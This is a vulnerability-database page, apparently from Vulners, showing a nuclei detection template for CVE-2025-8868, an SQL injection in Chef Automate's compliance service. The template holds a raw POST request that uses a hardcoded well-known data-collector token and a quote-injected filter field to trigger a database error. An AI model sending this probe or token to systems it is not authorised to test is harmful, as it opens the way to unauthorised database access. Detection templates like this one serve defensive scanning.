Lucene search
K

Chef Automate < 4.13.295 — SQL Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Authenticated attacker can exploit SQL injection in Chef Automate before 4.13.295 on Linux.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-8868
29 Sep 202512:39
circl
CNNVD
Chef Automate 信息泄露漏洞
29 Sep 202500:00
cnnvd
CVE
CVE-2025-8868
29 Sep 202511:29
cve
Cvelist
CVE-2025-8868 Chef Automate compliance service SQL Injection Vulnerability
29 Sep 202511:29
cvelist
EUVD
EUVD-2025-31570
3 Oct 202520:07
euvd
NVD
CVE-2025-8868
29 Sep 202512:15
nvd
Positive Technologies
PT-2025-39824
29 Sep 202500:00
ptsecurity
RedhatCVE
CVE-2025-8868
30 Sep 202511:31
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-8868
16 Oct 202500:00
vulncheck_kev
Vulnrichment
CVE-2025-8868 Chef Automate compliance service SQL Injection Vulnerability
29 Sep 202511:29
vulnrichment
Rows per page
id: CVE-2025-8868

info:
  name: Chef Automate < 4.13.295 — SQL Injection
  author: 3th1c_yuk1,xbow
  severity: critical
  description: |
    In Progress Chef Automate, versions earlier than 4.13.295, on Linux x86 platform, an authenticated attacker can gain access to Chef Automate restricted functionality in the compliance service via improperly neutralized inputs used in an SQL command using a well-known token.
  impact: |
    Authenticated attackers with knowledge of a well-known token can execute arbitrary SQL queries through the compliance service, potentially gaining access to restricted functionality and sensitive data.
  remediation: |
    Upgrade to version 4.13.295 or later.
  reference:
    - https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8868
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-8868
    epss-score: 0.22827
    epss-percentile: 0.97455
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Chef Automate"
  tags: cve,cve2025,chef,automate,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /api/v0/compliance/profiles/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

        {"filters": [{"type": "name'", "values": ["test"]}]}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 500"
          - "contains(body, 'pq: syntax error')"
          - "contains(content_type, 'application/json')"
        condition: and
# digest: 490a0046304402200a4cdb903f79fb1347f41eed46b3b07a1842bd4fe501b00df8c8327fb126f5c802205b7fff66dd665c5f98251d5e2f51ba7c241769164694fbaba19d48256bb50e9c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.18.8 - 9.8
EPSS0.22827
SSVC
13